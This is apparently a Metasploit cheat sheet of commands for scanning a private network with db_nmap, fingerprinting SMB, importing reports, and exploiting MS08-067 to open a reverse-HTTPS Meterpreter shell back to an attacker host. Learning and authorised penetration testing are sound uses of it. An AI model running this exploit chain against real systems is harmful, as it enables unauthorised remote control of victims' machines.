Metasploit Framework (msf)
sudo msfconsole
msf> db_connect <username>:<password>@127.0.0.1/<DATABASE>
check the db connection, then create a workspace:
msf> db_status
msf> workspace
(answers: default)
msf> workspace -a customer1-dmz1
db_nmap -A -sT 192.168.50.0/24
db_nmap -sT -sU --script smb-check-vulns.nse -p U:137,T:139 192.168.50.20
(nmap only scans the U: ports when a UDP scan, -sU, is requested; with -sT alone U:137 is silently ignored)
Read this article from spareclockcycles.org
auxiliary
see /opt/backbox/msf/modules/auxiliary/scanner/smb
msf> use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version)> show options
msf auxiliary(smb_version)> set RHOSTS 192.168.50.20
msf auxiliary(smb_version)> exploit
msf auxiliary(smb_version)> back
msf>
See the Metasploit Unleashed website on Auxiliary Modules.
msf> db_import /home/user/report.nbe
msf> hosts -c address,name,os_flavor,svcs,vulns
-c selects the columns to display
msf> vulns -i
msf> search ms09_001
search msf for an exploit matching the vulnerability
- module: component of Metasploit Framework (e.g. scanner, payload)
- vulnerability: security flaw in software that allows for unintended use
- exploit: code that makes use of a vulnerability to execute arbitrary commands
- stager: ‘magic tricks’ that allow your payload to execute successfully
- payload: arbitrary commands in shellcode (e.g. DoS or a remote shell)
Example ms08-067 (rank: great):
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)> show options
msf exploit(ms08_067_netapi)> set RHOST 192.168.50.20
(recent versions of the framework name this option RHOSTS)
msf exploit(ms08_067_netapi)> setg LHOST 192.168.50.10
msf exploit(ms08_067_netapi)> show payloads
or with TAB completion:
msf exploit(ms08_067_netapi)> set PAYLOAD windows/meterpreter/reverse_https
msf exploit(ms08_067_netapi)> show advanced
msf exploit(ms08_067_netapi)> exploit
Read more about the pass-the-hash technique.
Links on Meterpreter
From (2013): http://sinflood.net/?p=283
Other web sites on msf
metasploit-unleashed online course